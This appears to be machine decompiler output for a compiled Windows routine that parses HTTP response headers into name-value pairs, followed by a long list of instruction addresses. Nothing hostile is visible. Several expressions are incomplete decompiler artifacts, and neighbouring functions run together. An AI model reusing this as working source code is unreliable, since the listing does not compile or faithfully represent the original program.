                                                                                        				char _v556;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t288;
                                                                                        				signed int _t289;
                                                                                        				char _t293;
                                                                                        				intOrPtr* _t300;
                                                                                        				void _t310;
                                                                                        				intOrPtr* _t313;
                                                                                        				int _t314;
                                                                                        				signed int _t320;
                                                                                        				signed int _t321;
                                                                                        				char _t324;
                                                                                        				intOrPtr* _t331;
                                                                                        				intOrPtr _t339;
                                                                                        				signed int _t342;
                                                                                        				intOrPtr* _t346;
                                                                                        				unsigned int _t351;
                                                                                        				void* _t354;
                                                                                        				void _t357;
                                                                                        				void _t361;
                                                                                        				char _t363;
                                                                                        				void* _t366;
                                                                                        				void _t371;
                                                                                        				char* _t380;
                                                                                        				intOrPtr _t385;
                                                                                        				signed int _t401;
                                                                                        				signed int _t402;
                                                                                        				intOrPtr _t411;
                                                                                        				intOrPtr* _t419;
                                                                                        				void* _t423;
                                                                                        				signed int _t425;
                                                                                        				unsigned int _t426;
                                                                                        				char* _t427;
                                                                                        				void* _t429;
                                                                                        				void* _t447;
                                                                                        				char _t449;
                                                                                        				void* _t450;
                                                                                        				unsigned int _t451;
                                                                                        				signed int _t466;
                                                                                        				signed int _t473;
                                                                                        				void* _t475;
                                                                                        				void* _t478;
                                                                                        				signed int* _t481;
                                                                                        				char _t484;
                                                                                        				intOrPtr _t485;
                                                                                        				signed int** _t491;
                                                                                        				intOrPtr _t499;
                                                                                        				void* _t501;
                                                                                        				void* _t502;
                                                                                        				void _t505;
                                                                                        				signed int _t506;
                                                                                        				intOrPtr _t507;
                                                                                        				void* _t508;
                                                                                        				void* _t509;
                                                                                        				signed int* _t510;
                                                                                        				void* _t511;
                                                                                        				intOrPtr _t513;
                                                                                        				signed int* _t514;
                                                                                        				void* _t519;
                                                                                        				signed int _t520;
                                                                                        				void* _t523;
                                                                                        				void* _t530;
                                                                                        				void* _t531;
                                                                                        				signed int _t532;
                                                                                        				void* _t533;
                                                                                        				signed int _t534;
                                                                                        				void* _t535;
                                                                                        				void* _t537;
                                                                                        				signed int _t538;
                                                                                        				void* _t540;
                                                                                        
                                                                                        				_t423 = __ebx;
                                                                                        				_t288 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t289 = _t288 ^ _t532;
                                                                                        				_v20 = _t289;
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t510 = _a4;
                                                                                        				_t520 = _a8;
                                                                                        				_v120 = _t510;
                                                                                        				_v76 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v80 = _t510;
                                                                                        				 *_t510 = 0;
                                                                                        				_t510[1] = 0;
                                                                                        				 *_t510 = E00165790();
                                                                                        				_t511 = 0;
                                                                                        				_v76 = 1;
                                                                                        				_v84 = 0;
                                                                                        				_v96 = 0;
                                                                                        				_v92 = 0;
                                                                                        				_v88 = 0;
                                                                                        				_v8 = 1;
                                                                                        				_v288 = 0x1901ec;
                                                                                        				__imp__??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ(_t289, _t509, _t519,  *[fs:0x0], E0018D14D, 0xffffffff);
                                                                                        				_v8 = 2;
                                                                                        				_v76 = 3;
                                                                                        				__imp__??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z( &_v272, 0, 0);
                                                                                        				_t293 = _v288;
                                                                                        				_push(1);
                                                                                        				_v8 = 3;
                                                                                        				_t24 = _t293 + 4; // 0x60
                                                                                        				 *((intOrPtr*)(_t532 +  *_t24 - 0x11c)) = 0x1901e8;
                                                                                        				_t28 = _v288 + 4; // 0x0
                                                                                        				_t29 =  *_t28 - 0x60; // -96
                                                                                        				 *((intOrPtr*)(_t532 +  *_t28 - 0x120)) = _t29;
                                                                                        				E001692B0(__ebx, 0, _t520, _t520);
                                                                                        				_v28 = 0;
                                                                                        				_v24 = 0xf;
                                                                                        				_v44 = 0;
                                                                                        				_v8 = 5;
                                                                                        				_t300 = E00169140( &_v288,  &_v44, 0xa);
                                                                                        				_t537 = _t535 - 0x110 + 0xc;
                                                                                        				if(( *( *((intOrPtr*)( *_t300 + 4)) + _t300 + 0xc) & 0x00000006) == 0) {
                                                                                        					_t520 = 0;
                                                                                        					do {
                                                                                        						_push( &_v44);
                                                                                        						if(_t520 == _t511) {
                                                                                        							_push(_t511);
                                                                                        							L00168B20( &_v96);
                                                                                        							_t520 = _v88;
                                                                                        							_t511 = _v92;
                                                                                        						} else {
                                                                                        							E001622D0(_t511);
                                                                                        							_t511 = _t511 + 0x18;
                                                                                        							_v92 = _t511;
                                                                                        						}
                                                                                        						_t419 = E00169140( &_v288,  &_v44, 0xa);
                                                                                        						_t537 = _t537 + 0xc;
                                                                                        					} while (( *( *((intOrPtr*)( *_t419 + 4)) + _t419 + 0xc) & 0x00000006) == 0);
                                                                                        					_t511 = _v96;
                                                                                        					_v84 = _t511;
                                                                                        				}
                                                                                        				_t495 = _v24;
                                                                                        				_v8 = 4;
                                                                                        				if(_t495 >= 0x10) {
                                                                                        					_t484 = _v44;
                                                                                        					_t495 = _t495 + 1;
                                                                                        					_t381 = _t484;
                                                                                        					if(_t495 >= 0x1000) {
                                                                                        						_t484 =  *((intOrPtr*)(_t484 - 4));
                                                                                        						_t495 = _t495 + 0x23;
                                                                                        						if(_t381 > 0x1f) {
                                                                                        							L10:
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t495);
                                                                                        					E00175733(_t381, _t484);
                                                                                        					_t537 = _t537 + 8;
                                                                                        				}
                                                                                        				if(_t511 == _v92) {
                                                                                        					L69:
                                                                                        					_t174 = _v288 + 4; // 0x0
                                                                                        					 *((intOrPtr*)(_t532 +  *_t174 - 0x11c)) = 0x1901e8;
                                                                                        					_t178 = _v288 + 4; // 0x0
                                                                                        					_t179 =  *_t178 - 0x60; // -96
                                                                                        					 *((intOrPtr*)(_t532 +  *_t178 - 0x120)) = _t179;
                                                                                        					E00165380( &_v272);
                                                                                        					__imp__??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ();
                                                                                        					__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
                                                                                        					E00166FC0(_t423,  &_v96);
                                                                                        					 *[fs:0x0] = _v16;
                                                                                        					return E001755F4(_v20 ^ _t532);
                                                                                        				} else {
                                                                                        					do {
                                                                                        						_v28 = 0;
                                                                                        						_t310 = _t511;
                                                                                        						_v24 = 0xf;
                                                                                        						_t447 =  <  ?  *(_t511 + 0x10) : 5;
                                                                                        						_v44 = 0;
                                                                                        						if( *((intOrPtr*)(_t511 + 0x14)) >= 0x10) {
                                                                                        							_t310 =  *_t511;
                                                                                        						}
                                                                                        						E00163450(_t423, _t495, _t511, _t310, _t447);
                                                                                        						_v76 = _v76 | 0x00000004;
                                                                                        						_t495 = _v24;
                                                                                        						_t449 = _v44;
                                                                                        						_t313 =  >=  ? _t449 :  &_v44;
                                                                                        						if(_v28 != 5 ||  *_t313 != 0x50545448) {
                                                                                        							L19:
                                                                                        							_v69 = 0;
                                                                                        						} else {
                                                                                        							_v69 = 1;
                                                                                        							if( *((char*)(_t313 + 4)) != 0x2f) {
                                                                                        								goto L19;
                                                                                        							}
                                                                                        						}
                                                                                        						if(_t495 < 0x10) {
                                                                                        							L24:
                                                                                        							if(_v69 != 0) {
                                                                                        								_v8 = 6;
                                                                                        								_t520 =  *_v80;
                                                                                        								_t83 = _t520 + 4; // 0xffff40b5
                                                                                        								E00167760(_t423, _v80, _t511, _t520,  *_t83);
                                                                                        								_t491 = _v80;
                                                                                        								_v8 = 4;
                                                                                        								( *_t491)[1] = _t520;
                                                                                        								 *( *_t491) = _t520;
                                                                                        								( *_t491)[2] = _t520;
                                                                                        								_t491[1] = 0;
                                                                                        							}
                                                                                        							_t314 =  *(_t511 + 0x10);
                                                                                        							_v104 = _t314;
                                                                                        							if(_t314 == 0) {
                                                                                        								goto L68;
                                                                                        							} else {
                                                                                        								_t450 = _t511;
                                                                                        								_v112 = _t511;
                                                                                        								if( *((intOrPtr*)(_t511 + 0x14)) >= 0x10) {
                                                                                        									_t450 =  *_t511;
                                                                                        									_v112 = _t450;
                                                                                        								}
                                                                                        								if(_t314 < 1) {
                                                                                        									L38:
                                                                                        									_t520 = _t520 | 0xffffffff;
                                                                                        								} else {
                                                                                        									_t495 = _t450 + _t314;
                                                                                        									_v108 = _t450 + _t314;
                                                                                        									_t520 = memchr(_t450, 0x3a, _t314);
                                                                                        									_t537 = _t537 + 0xc;
                                                                                        									if(_t520 == 0) {
                                                                                        										L37:
                                                                                        										_t314 = _v104;
                                                                                        										goto L38;
                                                                                        									} else {
                                                                                        										while(1) {
                                                                                        											_t401 =  *_t520 & 0x000000ff;
                                                                                        											if(_t401 != 0x3a) {
                                                                                        												asm("sbb eax, eax");
                                                                                        												_t402 = _t401 | 0x00000001;
                                                                                        											} else {
                                                                                        												_t402 = 0;
                                                                                        											}
                                                                                        											if(_t402 == 0) {
                                                                                        												break;
                                                                                        											}
                                                                                        											_t520 = memchr(_t520 + 1, 0x3a, _v108 - _t520 + 1);
                                                                                        											_t537 = _t537 + 0xc;
                                                                                        											if(_t520 != 0) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L37;
                                                                                        											}
                                                                                        											goto L39;
                                                                                        										}
                                                                                        										_t520 = _t520 - _v112;
                                                                                        										_t314 = _v104;
                                                                                        									}
                                                                                        								}
                                                                                        								L39:
                                                                                        								if(_t520 == 0xffffffff) {
                                                                                        									goto L68;
                                                                                        								} else {
                                                                                        									_t98 = _t520 + 2; // 0x2
                                                                                        									_v52 = 0;
                                                                                        									_v48 = 0xf;
                                                                                        									_v68 = 0;
                                                                                        									if(_t314 < _t98) {
                                                                                        										E00164210(_t423, _t450, _t511);
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										asm("int3");
                                                                                        										_push(_t532);
                                                                                        										_t533 = _t537;
                                                                                        										_t538 = _t537 - 0xc;
                                                                                        										_push(_t520);
                                                                                        										_t523 = _t450;
                                                                                        										_push(_t511);
                                                                                        										_t189 = _t523 + 0x14; // 0x0
                                                                                        										_t451 =  *_t189;
                                                                                        										_t190 = _t523 + 0x10; // 0x169520
                                                                                        										_t513 =  *_t190;
                                                                                        										_v316 = _t451;
                                                                                        										if(_t513 >= _t451) {
                                                                                        											_t498 = 0x7fffffff;
                                                                                        											if(0x7fffffff - _t513 < 1) {
                                                                                        												E001631F0(0x7fffffff);
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												_t534 = _t538;
                                                                                        												_t320 =  *0x19d05c; // 0x2c80d730
                                                                                        												_t321 = _t320 ^ _t534;
                                                                                        												_v348 = _t321;
                                                                                        												 *[fs:0x0] =  &_v344;
                                                                                        												_t514 = _v324;
                                                                                        												_v380 = _t514;
                                                                                        												_v376 = 0;
                                                                                        												 *_t514 = 0;
                                                                                        												_t514[1] = 0;
                                                                                        												_t514[2] = 0;
                                                                                        												_v336 = 0;
                                                                                        												_v376 = 1;
                                                                                        												_v556 = 0x1900e8;
                                                                                        												_v540 = 0x1900f0;
                                                                                        												__imp__??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ(_t321, _t513, _t523,  *[fs:0x0], E0018D1D2, 0xffffffff, _t533);
                                                                                        												_v336 = 1;
                                                                                        												_v376 = 3;
                                                                                        												__imp__??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z( &_v532, 0);
                                                                                        												_t324 = _v556;
                                                                                        												_push(3);
                                                                                        												_v336 = 2;
                                                                                        												_t236 = _t324 + 4; // 0x68
                                                                                        												 *((intOrPtr*)(_t534 +  *_t236 - 0xe0)) = 0x1900e4;
                                                                                        												_t240 = _v556 + 4; // 0x0
                                                                                        												_t241 =  *_t240 - 0x68; // -104
                                                                                        												 *((intOrPtr*)(_t534 +  *_t240 - 0xe4)) = _t241;
                                                                                        												E001692B0(_t423, _t514, _v320, _v320);
                                                                                        												_v336 = 3;
                                                                                        												_v356 = 0;
                                                                                        												_v352 = 0xf;
                                                                                        												_v372 = 0;
                                                                                        												_t525 = _v316;
                                                                                        												_v336 = 4;
                                                                                        												_t331 = E00169140( &_v556,  &_v372, _v316);
                                                                                        												_t540 = _t538 - 0xd4 + 0xc;
                                                                                        												if(( *( *((intOrPtr*)( *_t331 + 4)) + _t331 + 0xc) & 0x00000006) == 0) {
                                                                                        													do {
                                                                                        														_t342 = _t514[1];
                                                                                        														_push( &_v52);
                                                                                        														if(_t514[2] == _t342) {
                                                                                        															_push(_t342);
                                                                                        															L00168B20(_t514);
                                                                                        														} else {
                                                                                        															E001622D0(_t342);
                                                                                        															_t514[1] = _t514[1] + 0x18;
                                                                                        														}
                                                                                        														_t346 = E00169140( &_v236,  &_v52, _t525);
                                                                                        														_t540 = _t540 + 0xc;
                                                                                        													} while (( *( *((intOrPtr*)( *_t346 + 4)) + _t346 + 0xc) & 0x00000006) == 0);
                                                                                        												}
                                                                                        												_t499 = _v32;
                                                                                        												if(_t499 >= 0x10) {
                                                                                        													_t466 = _v52;
                                                                                        													_t501 = _t499 + 1;
                                                                                        													_t339 = _t466;
                                                                                        													if(_t501 >= 0x1000) {
                                                                                        														_t466 =  *((intOrPtr*)(_t466 - 4));
                                                                                        														_t501 = _t501 + 0x23;
                                                                                        														if(_t339 > 0x1f) {
                                                                                        															__imp___invalid_parameter_noinfo_noreturn();
                                                                                        														}
                                                                                        													}
                                                                                        													_push(_t501);
                                                                                        													E00175733(_t339, _t466);
                                                                                        												}
                                                                                        												_t274 = _v236 + 4; // 0x0
                                                                                        												 *((intOrPtr*)(_t534 +  *_t274 - 0xe0)) = 0x1900e4;
                                                                                        												_t278 = _v236 + 4; // 0x0
                                                                                        												_t279 =  *_t278 - 0x68; // -104
                                                                                        												 *((intOrPtr*)(_t534 +  *_t278 - 0xe4)) = _t279;
                                                                                        												E00165380( &_v212);
                                                                                        												__imp__??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ();
                                                                                        												__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
                                                                                        												 *[fs:0x0] = _v24;
                                                                                        												return E001755F4(_v28 ^ _t534);
                                                                                        											} else {
                                                                                        												_push(_t423);
                                                                                        												_t198 = _t513 + 1; // 0x169521
                                                                                        												_t425 = _t198 | 0x0000000f;
                                                                                        												if(_t425 <= 0x7fffffff) {
                                                                                        													_t351 = _t451 >> 1;
                                                                                        													_t498 = 0x7fffffff - _t351;
                                                                                        													if(_t451 <= 0x7fffffff) {
                                                                                        														_t426 =  <  ? _t351 + _t451 : _t425;
                                                                                        													} else {
                                                                                        														_t426 = 0x7fffffff;
                                                                                        													}
                                                                                        												} else {
                                                                                        													_t426 = 0x7fffffff;
                                                                                        												}
                                                                                        												_t199 = _t426 + 1; // 0x80000000
                                                                                        												_t354 = E00163200(_t498, _t199);
                                                                                        												_t201 = _t513 + 1; // 0x169521
                                                                                        												 *(_t523 + 0x14) = _t426;
                                                                                        												_v16 = _t354;
                                                                                        												_t427 = _t354 + _t513;
                                                                                        												 *((intOrPtr*)(_t523 + 0x10)) = _t201;
                                                                                        												_v20 = _t427;
                                                                                        												_push(_t513);
                                                                                        												if(_v12 < 0x10) {
                                                                                        													L87:
                                                                                        													memcpy(_t354, _t523, ??);
                                                                                        													 *_t427 = _v0;
                                                                                        													_t357 = _v16;
                                                                                        													 *((char*)(_t427 + 1)) = 0;
                                                                                        													 *_t523 = _t357;
                                                                                        													return _t357;
                                                                                        												} else {
                                                                                        													_t429 =  *_t523;
                                                                                        													memcpy(_t354, _t429, ??);
                                                                                        													_t473 = _v20;
                                                                                        													_t538 = _t538 + 0xc;
                                                                                        													_t359 = _v0;
                                                                                        													 *_t473 = _v0;
                                                                                        													 *((char*)(_t473 + 1)) = 0;
                                                                                        													_t475 = _v12 + 1;
                                                                                        													if(_t475 < 0x1000) {
                                                                                        														L85:
                                                                                        														_push(_t475);
                                                                                        														E00175733(_t359, _t429);
                                                                                        														_t361 = _v16;
                                                                                        														 *_t523 = _t361;
                                                                                        														return _t361;
                                                                                        													} else {
                                                                                        														_t211 = _t429 - 4; // 0x2b000000
                                                                                        														_t502 =  *_t211;
                                                                                        														_t475 = _t475 + 0x23;
                                                                                        														_t427 = _t429 - _t502;
                                                                                        														_t212 = _t427 - 4; // 0x7ffffffb
                                                                                        														_t354 = _t212;
                                                                                        														if(_t354 > 0x1f) {
                                                                                        															__imp___invalid_parameter_noinfo_noreturn();
                                                                                        															goto L87;
                                                                                        														} else {
                                                                                        															_t429 = _t502;
                                                                                        															goto L85;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t192 = _t513 + 1; // 0x169521
                                                                                        											 *((intOrPtr*)(_t523 + 0x10)) = _t192;
                                                                                        											if(_t451 >= 0x10) {
                                                                                        												_t523 =  *_t523;
                                                                                        											}
                                                                                        											_t363 = _v0;
                                                                                        											 *((char*)(_t523 + _t513)) = _t363;
                                                                                        											 *((char*)(_t523 + _t513 + 1)) = 0;
                                                                                        											return _t363;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t103 = _t520 + 2; // 0x2
                                                                                        										_t478 = _t103;
                                                                                        										_t504 =  <  ? _t478 : 1;
                                                                                        										_t366 = _v104 - ( <  ? _t478 : 1);
                                                                                        										_t505 = _t511;
                                                                                        										if( *((intOrPtr*)(_t511 + 0x14)) >= 0x10) {
                                                                                        											_t505 =  *_t511;
                                                                                        										}
                                                                                        										E00163450(_t423, _t505, _t511, _t505 + _t478, _t366);
                                                                                        										_v76 = _v76 | 0x00000008;
                                                                                        										_t506 = _v52;
                                                                                        										_t370 =  >=  ? _v68 :  &_v68;
                                                                                        										_v8 = 7;
                                                                                        										if( *((char*)(_t506 + ( >=  ? _v68 :  &_v68) - 1)) == 0xd) {
                                                                                        											_t116 = _t506 - 1; // -1
                                                                                        											_v28 = 0;
                                                                                        											_v24 = 0xf;
                                                                                        											_v44 = 0;
                                                                                        											_t487 =  <  ? _t506 : _t116;
                                                                                        											_t397 =  >=  ? _v68 :  &_v68;
                                                                                        											E00163450(_t423, _t506, _t511,  >=  ? _v68 :  &_v68,  <  ? _t506 : _t116);
                                                                                        											_v76 = _v76 | 0x00000010;
                                                                                        											E00162440( &_v68, _t520);
                                                                                        											asm("movups xmm0, [ebp-0x28]");
                                                                                        											asm("movups [ebp-0x40], xmm0");
                                                                                        											asm("movq xmm0, [ebp-0x18]");
                                                                                        											asm("movq [ebp-0x30], xmm0");
                                                                                        										}
                                                                                        										_t371 = _t511;
                                                                                        										_v28 = 0;
                                                                                        										_t530 =  <  ?  *(_t511 + 0x10) : _t520;
                                                                                        										_v24 = 0xf;
                                                                                        										_v44 = 0;
                                                                                        										if( *((intOrPtr*)(_t511 + 0x14)) >= 0x10) {
                                                                                        											_t371 =  *_t511;
                                                                                        										}
                                                                                        										E00163450(_t423, _t506, _t511, _t371, _t530);
                                                                                        										_v76 = _v76 | 0x00000020;
                                                                                        										_t481 = _v80;
                                                                                        										_v8 = 8;
                                                                                        										_t531 =  *_t481;
                                                                                        										_t511 =  *(_t531 + 4);
                                                                                        										while( *((char*)(_t511 + 0xd)) == 0) {
                                                                                        											_t141 = _t511 + 0x10; // 0x10
                                                                                        											if(E00165DC0(_t481, _t141,  &_v44) == 0) {
                                                                                        												_t531 = _t511;
                                                                                        												_t511 =  *_t511;
                                                                                        											} else {
                                                                                        												_t511 =  *(_t511 + 8);
                                                                                        											}
                                                                                        											_t481 = _v80;
                                                                                        										}
                                                                                        										if(_t531 ==  *_t481) {
                                                                                        											L56:
                                                                                        											_v108 =  &_v44;
                                                                                        											_push( &_v97);
                                                                                        											E00168D30(_v80,  &_v116, _t531, E00168A50(_t481, 0x1901e0,  &_v108) + 0x10, _t376);
                                                                                        											_t520 = _v116;
                                                                                        										} else {
                                                                                        											_t147 = _t531 + 0x10; // 0x10
                                                                                        											if(E00165DC0(_t481,  &_v44, _t147) != 0) {
                                                                                        												_t481 = _v80;
                                                                                        												goto L56;
                                                                                        											}
                                                                                        										}
                                                                                        										_t380 =  &_v68;
                                                                                        										if(_t520 + 0x28 != _t380) {
                                                                                        											_t388 =  >=  ? _v68 : _t380;
                                                                                        											E00163450(_t423, _t506, _t511,  >=  ? _v68 : _t380, _v52);
                                                                                        										}
                                                                                        										_t507 = _v24;
                                                                                        										_v8 = 7;
                                                                                        										if(_t507 < 0x10) {
                                                                                        											L63:
                                                                                        											_t495 = _v48;
                                                                                        											_v8 = 4;
                                                                                        											if(_t495 < 0x10) {
                                                                                        												L67:
                                                                                        												_t511 = _v84;
                                                                                        												goto L68;
                                                                                        											} else {
                                                                                        												_t484 = _v68;
                                                                                        												_t495 = _t495 + 1;
                                                                                        												_t381 = _t484;
                                                                                        												if(_t495 < 0x1000) {
                                                                                        													L66:
                                                                                        													_push(_t495);
                                                                                        													E00175733(_t381, _t484);
                                                                                        													_t537 = _t537 + 8;
                                                                                        													goto L67;
                                                                                        												} else {
                                                                                        													_t484 =  *((intOrPtr*)(_t484 - 4));
                                                                                        													_t495 = _t495 + 0x23;
                                                                                        													if(_t381 > 0x1f) {
                                                                                        														goto L10;
                                                                                        													} else {
                                                                                        														goto L66;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											_t485 = _v44;
                                                                                        											_t508 = _t507 + 1;
                                                                                        											_t385 = _t485;
                                                                                        											if(_t508 < 0x1000) {
                                                                                        												L62:
                                                                                        												_push(_t508);
                                                                                        												E00175733(_t385, _t485);
                                                                                        												_t537 = _t537 + 8;
                                                                                        												goto L63;
                                                                                        											} else {
                                                                                        												_t484 =  *((intOrPtr*)(_t485 - 4));
                                                                                        												_t495 = _t508 + 0x23;
                                                                                        												_t381 = _t385 - _t484 + 0xfffffffc;
                                                                                        												if(_t385 - _t484 + 0xfffffffc > 0x1f) {
                                                                                        													goto L10;
                                                                                        												} else {
                                                                                        													goto L62;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t495 = _t495 + 1;
                                                                                        							_t411 = _t449;
                                                                                        							if(_t495 < 0x1000) {
                                                                                        								L23:
                                                                                        								_push(_t495);
                                                                                        								E00175733(_t411, _t449);
                                                                                        								_t537 = _t537 + 8;
                                                                                        								goto L24;
                                                                                        							} else {
                                                                                        								_t484 =  *((intOrPtr*)(_t449 - 4));
                                                                                        								_t495 = _t495 + 0x23;
                                                                                        								_t381 = _t411 - _t484 + 0xfffffffc;
                                                                                        								if(_t411 - _t484 + 0xfffffffc > 0x1f) {
                                                                                        									goto L10;
                                                                                        								} else {
                                                                                        									goto L23;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L101;
                                                                                        						L68:
                                                                                        						_t511 = _t511 + 0x18;
                                                                                        						_v84 = _t511;
                                                                                        					} while (_t511 != _v92);
                                                                                        					goto L69;
                                                                                        				}
                                                                                        				L101:
                                                                                        			}


























































































































                                                                                        0x00169650
                                                                                        0x00169667
                                                                                        0x0016966c
                                                                                        0x0016966e
                                                                                        0x00169677
                                                                                        0x0016967d
                                                                                        0x00169682
                                                                                        0x00169685
                                                                                        0x00169688
                                                                                        0x0016968f
                                                                                        0x00169696
                                                                                        0x00169699
                                                                                        0x0016969f
                                                                                        0x001696ab
                                                                                        0x001696ad
                                                                                        0x001696af
                                                                                        0x001696b6
                                                                                        0x001696b9
                                                                                        0x001696bc
                                                                                        0x001696bf
                                                                                        0x001696c8
                                                                                        0x001696cf
                                                                                        0x001696d9
                                                                                        0x001696e7
                                                                                        0x001696f2
                                                                                        0x001696f9
                                                                                        0x001696ff
                                                                                        0x00169705
                                                                                        0x00169708
                                                                                        0x0016970f
                                                                                        0x00169712
                                                                                        0x00169723
                                                                                        0x00169726
                                                                                        0x00169729
                                                                                        0x00169736
                                                                                        0x0016973b
                                                                                        0x0016973e
                                                                                        0x00169745
                                                                                        0x0016974e
                                                                                        0x0016975a
                                                                                        0x00169761
                                                                                        0x0016976e
                                                                                        0x00169770
                                                                                        0x00169772
                                                                                        0x00169775
                                                                                        0x00169778
                                                                                        0x00169789
                                                                                        0x0016978d
                                                                                        0x00169792
                                                                                        0x00169795
                                                                                        0x0016977a
                                                                                        0x0016977c
                                                                                        0x00169781
                                                                                        0x00169784
                                                                                        0x00169784
                                                                                        0x001697a5
                                                                                        0x001697ac
                                                                                        0x001697b4
                                                                                        0x001697bb
                                                                                        0x001697be
                                                                                        0x001697be
                                                                                        0x001697c1
                                                                                        0x001697c4
                                                                                        0x001697cb
                                                                                        0x001697cd
                                                                                        0x001697d0
                                                                                        0x001697d1
                                                                                        0x001697d9
                                                                                        0x001697db
                                                                                        0x001697de
                                                                                        0x001697e9
                                                                                        0x001697eb
                                                                                        0x001697eb
                                                                                        0x001697eb
                                                                                        0x001697e9
                                                                                        0x001697f1
                                                                                        0x001697f3
                                                                                        0x001697f8
                                                                                        0x001697f8
                                                                                        0x001697fe
                                                                                        0x00169b57
                                                                                        0x00169b5d
                                                                                        0x00169b60
                                                                                        0x00169b71
                                                                                        0x00169b74
                                                                                        0x00169b77
                                                                                        0x00169b84
                                                                                        0x00169b8f
                                                                                        0x00169b9b
                                                                                        0x00169ba4
                                                                                        0x00169baf
                                                                                        0x00169bc6
                                                                                        0x00169810
                                                                                        0x00169810
                                                                                        0x00169815
                                                                                        0x0016981f
                                                                                        0x00169821
                                                                                        0x00169828
                                                                                        0x00169830
                                                                                        0x00169834
                                                                                        0x00169836
                                                                                        0x00169836
                                                                                        0x0016983d
                                                                                        0x00169842
                                                                                        0x00169849
                                                                                        0x0016984f
                                                                                        0x00169852
                                                                                        0x00169859
                                                                                        0x0016986d
                                                                                        0x0016986d
                                                                                        0x00169863
                                                                                        0x00169867
                                                                                        0x0016986b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016986b
                                                                                        0x00169874
                                                                                        0x0016989f
                                                                                        0x001698a3
                                                                                        0x001698aa
                                                                                        0x001698ae
                                                                                        0x001698b0
                                                                                        0x001698b3
                                                                                        0x001698b8
                                                                                        0x001698bb
                                                                                        0x001698c1
                                                                                        0x001698c6
                                                                                        0x001698ca
                                                                                        0x001698cd
                                                                                        0x001698cd
                                                                                        0x001698d4
                                                                                        0x001698d7
                                                                                        0x001698dc
                                                                                        0x00000000
                                                                                        0x001698e2
                                                                                        0x001698e6
                                                                                        0x001698e8
                                                                                        0x001698eb
                                                                                        0x001698ed
                                                                                        0x001698ef
                                                                                        0x001698ef
                                                                                        0x001698f5
                                                                                        0x00169943
                                                                                        0x00169943
                                                                                        0x001698f7
                                                                                        0x001698f8
                                                                                        0x001698fe
                                                                                        0x00169906
                                                                                        0x00169908
                                                                                        0x0016990d
                                                                                        0x00169940
                                                                                        0x00169940
                                                                                        0x00000000
                                                                                        0x00169910
                                                                                        0x00169910
                                                                                        0x00169910
                                                                                        0x00169915
                                                                                        0x0016991b
                                                                                        0x0016991d
                                                                                        0x00169917
                                                                                        0x00169917
                                                                                        0x00169917
                                                                                        0x00169922
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00169937
                                                                                        0x00169939
                                                                                        0x0016993e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0016993e
                                                                                        0x00169a5d
                                                                                        0x00169a60
                                                                                        0x00169a60
                                                                                        0x0016990d
                                                                                        0x00169946
                                                                                        0x00169949
                                                                                        0x00000000
                                                                                        0x0016994f
                                                                                        0x0016994f
                                                                                        0x00169952
                                                                                        0x00169959
                                                                                        0x00169960
                                                                                        0x00169966
                                                                                        0x00169bc7
                                                                                        0x00169bcc
                                                                                        0x00169bcd
                                                                                        0x00169bce
                                                                                        0x00169bcf
                                                                                        0x00169bd0
                                                                                        0x00169bd1
                                                                                        0x00169bd3
                                                                                        0x00169bd6
                                                                                        0x00169bd7
                                                                                        0x00169bd9
                                                                                        0x00169bda
                                                                                        0x00169bda
                                                                                        0x00169bdd
                                                                                        0x00169bdd
                                                                                        0x00169be0
                                                                                        0x00169be5
                                                                                        0x00169c07
                                                                                        0x00169c13
                                                                                        0x00169cd9
                                                                                        0x00169cde
                                                                                        0x00169cdf
                                                                                        0x00169ce1
                                                                                        0x00169cf7
                                                                                        0x00169cfc
                                                                                        0x00169cfe
                                                                                        0x00169d07
                                                                                        0x00169d0d
                                                                                        0x00169d13
                                                                                        0x00169d16
                                                                                        0x00169d1d
                                                                                        0x00169d23
                                                                                        0x00169d2a
                                                                                        0x00169d34
                                                                                        0x00169d3b
                                                                                        0x00169d42
                                                                                        0x00169d4c
                                                                                        0x00169d56
                                                                                        0x00169d64
                                                                                        0x00169d72
                                                                                        0x00169d79
                                                                                        0x00169d7f
                                                                                        0x00169d85
                                                                                        0x00169d88
                                                                                        0x00169d8f
                                                                                        0x00169d92
                                                                                        0x00169da3
                                                                                        0x00169da6
                                                                                        0x00169da9
                                                                                        0x00169db6
                                                                                        0x00169dbb
                                                                                        0x00169dc2
                                                                                        0x00169dc9
                                                                                        0x00169dd0
                                                                                        0x00169dd4
                                                                                        0x00169de2
                                                                                        0x00169de7
                                                                                        0x00169dee
                                                                                        0x00169dfb
                                                                                        0x00169e00
                                                                                        0x00169e00
                                                                                        0x00169e06
                                                                                        0x00169e0a
                                                                                        0x00169e19
                                                                                        0x00169e1c
                                                                                        0x00169e0c
                                                                                        0x00169e0e
                                                                                        0x00169e13
